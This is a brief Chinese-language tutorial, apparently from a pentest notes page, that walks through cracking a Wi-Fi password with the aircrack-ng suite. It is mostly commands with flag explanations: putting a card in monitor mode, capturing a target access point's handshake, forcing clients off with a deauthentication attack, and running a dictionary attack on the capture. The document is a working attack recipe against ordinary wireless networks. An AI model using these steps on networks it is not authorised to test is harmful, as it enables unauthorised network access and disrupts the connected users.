Airmon-ng start wlan0
Airodump-ng mon0
Airodump-ng -c 1 --bssid XX:XX:XX:XX:XX -w mobi mon0-C参数是选择目标信道.如果该信道就目标一个AP使用的话不用加上--bssid,这个参数是为了跟精准的锁定目标~~-w是保存握手包的名字.获取后会在当前目录生成一个mobi-01.cap的握手包。这时就不用关闭这条shell而是另外打开一个shell
Aireplay-ng -0 10 -a (AP的mac) -c (客户端的mac) mon0
-0参数是发起deauth攻击.10 是次数可以调节
-a 即第一条shell中BSSID.下面的AP路由器MAC地址
-c 即STATION下客户机的MAC地址(这条为可选项)
Aircrack-ng -w /pentest/passwords/sxsx.lst mobi-01.cap
-w选择字典mobi-01.cap即抓到的握手包